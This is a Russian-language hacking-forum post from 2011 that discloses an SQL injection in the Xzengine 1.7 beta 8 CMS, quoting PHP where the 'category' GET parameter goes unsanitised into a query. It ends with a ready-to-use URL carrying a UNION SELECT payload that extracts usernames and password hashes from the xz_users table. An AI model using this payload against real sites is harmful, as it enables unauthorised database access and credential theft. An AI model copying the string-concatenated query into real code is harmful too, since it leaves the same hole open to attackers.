10.01.2011, 20:08
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Дополнение к посту ~d0s~(#444):
Xzengine 1.7 beta 8
SQL injection:
/index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
require_once[/COLOR][COLOR="#DD0000"]'./classes/viewnews.php'[/COLOR][COLOR="#007700"];
...
if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]]))
[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]];
...
[/COLOR][/COLOR]
/viewnews.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]AbstractDataBase[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Instance[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT * FROM '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_TBLPERFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 ORDER BY news_id DESC LIMIT '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]);
}
else
{[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]AbstractDataBase[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Instance[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT * FROM '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_TBLPERFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 AND news_category = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' ORDER BY news_id DESC LIMIT '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]);
}
...
[/COLOR][/COLOR]
Пример:
Код:
http://eng/index.php?category=3%20union%20select%20concat_ws(0x3a,users_login,users_password),2,3,4,5,6,7,8,9,10,11,12,13%20from%20xz_users%20limit%200,1--
|
|
|